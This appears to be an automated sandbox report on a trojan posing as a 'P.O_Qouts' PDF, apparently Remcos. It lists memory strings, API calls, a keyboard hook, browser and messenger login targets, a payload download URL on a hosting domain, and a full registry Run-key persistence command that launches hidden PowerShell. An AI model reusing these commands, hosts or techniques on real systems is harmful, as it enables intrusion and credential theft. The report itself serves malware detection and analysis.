              Source: wab.exe, 0000000D.00000003.3223017057.0000000003339000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.3224808710.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
              Source: wab.exe, 00000009.00000002.3531510152.0000000023D90000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000002.3531716982.0000000024670000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000002.3531716982.0000000024670000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: z194668-ex70k.ps02.zwhhosting.com
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhv887.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv887.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: powershell.exe, 00000002.00000002.3164302379.0000000007938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000002.00000002.3164302379.0000000007938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftJc
              Source: bhv887.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv887.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv887.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: wab.exe, 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exe, P.O_Qouts_t87E90Y-E4R7G-PDF.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exe, P.O_Qouts_t87E90Y-E4R7G-PDF.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv887.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000002.00000002.3160896387.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.3160896387.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.3160896387.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.3211794980.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000F.00000002.3211794980.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000009.00000002.3531510152.0000000023D90000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000009.00000002.3531510152.0000000023D90000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000D.00000002.3223718657.00000000009E4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: wab.exe, 00000009.00000002.3519866024.000000000836A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3531117585.0000000023960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.bin
              Source: wab.exe, 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binI
              Source: wab.exe, 00000009.00000002.3519866024.000000000836A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binQ
              Source: powershell.exe, 00000002.00000002.3160896387.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.3160896387.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: wab.exe, 0000000D.00000002.3224117965.0000000002DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: wab.exe, 0000000D.00000002.3224117965.0000000002DC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: wab.exe, 0000000D.00000002.3224117965.0000000002DC8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.3223017057.0000000003339000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.3224808710.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, 00000002.00000002.3163090245.0000000006187000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: wab.exe, wab.exe, 0000000F.00000002.3210525243.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00405326 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405326
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,13_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,14_2_00406E9F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,15_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3515260679.000000000078E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 356, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00402D66 NtdllDefWindowProc_A,15_2_00402D66
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_004067BE0_2_004067BE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501EAE02_2_0501EAE0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501F3B02_2_0501F3B0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0501E7982_2_0501E798
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DCB5C19_2_23DCB5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DD71949_2_23DD7194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B04013_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043610D13_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044731013_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044A49013_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040755A13_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0043C56013_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B61013_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044D6C013_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004476F013_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044B87013_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044081D13_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0041495713_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004079EE13_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407AEB13_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044AA8013_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00412AA913_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404B7413_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404B0313_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0044BBD813_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404BE513_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00404C7613_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00415CFE13_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00416D7213_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00446D3013_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00446D8B13_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406E8F13_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040503814_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041208C14_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004050A914_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040511A14_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043C13A14_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004051AB14_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044930014_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040D32214_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A4F014_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043A5AB14_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041363114_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044669014_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A73014_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004398D814_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004498E014_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A88614_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043DA0914_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00438D5E14_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00449ED014_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041FE8314_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00430F5414_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004050C215_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004014AB15_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040513315_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004051A415_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040124615_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040CA4615_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040523515_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004032C815_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040168915_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00402F6015_2_00402F60
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsw96B9.tmp\nsDialogs.dll D253CA5ABA34B925796777893F114CC741B015AF7868022AB1DB2341288C55ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)"
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@17/16@4/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,13_2_004182CE
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,15_2_00410DE1
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_004045D7 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045D7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,13_2_00413D4C
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,13_2_0040B58D
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeFile created: C:\Users\user\AppData\Local\VandskellenesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-HP1D61
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsv961B.tmpJump to behavior
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 00000009.00000002.3531716982.0000000024670000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 0000000D.00000003.3223199528.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.3222838023.000000000333A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeReversingLabs: Detection: 50%
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeVirustotal: Detection: 45%
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeFile read: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-33249
              Source: unknownProcess created: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe"
